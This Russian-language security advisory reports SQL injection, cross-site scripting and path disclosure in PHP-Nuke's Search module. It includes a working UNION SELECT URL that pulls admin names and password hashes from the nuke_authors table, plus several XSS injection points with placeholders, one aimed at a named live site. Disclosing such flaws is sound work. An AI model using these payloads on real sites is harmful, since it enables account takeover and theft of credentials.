Программа: PHP-Nuke 

Несколько уязвимостей обнаружено в PHP-Nuke в 'Search' модуле. Удаленный пользователь может внедрить SQL команды. Удаленный пользователь может выполнить XSS нападение. Удаленный пользователь может также определить инсталляционный путь. 

1. SQL инъекция: 

http://localhost/nuke73/modules.php?name= Search&type=stories&query=f00bar&category=-1
&categ=%2 0and%201=2%20UNION%20SELECT% 200,0,aid,pwd,0,0,0,0,0,0%20from%
20nuke_authors/*

2. XSS: 

http://localhost/nuke73/modules.php?name= Search&sid=[xss code here]
http://localhost/nuke73/modules.php?name= Search&query=*&max=[xss code here]
http://localhost/nuke73/modules.php?name= Search&query=waraxe&sel1=[xss code here]&type=comments
http://localhost/nuke73/modules.php?name= Search&a=6&query=*&match=[xss code here]
http://www.nukecops.com/modules.php?name =Search&query=*&m od3=[xss code here]

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии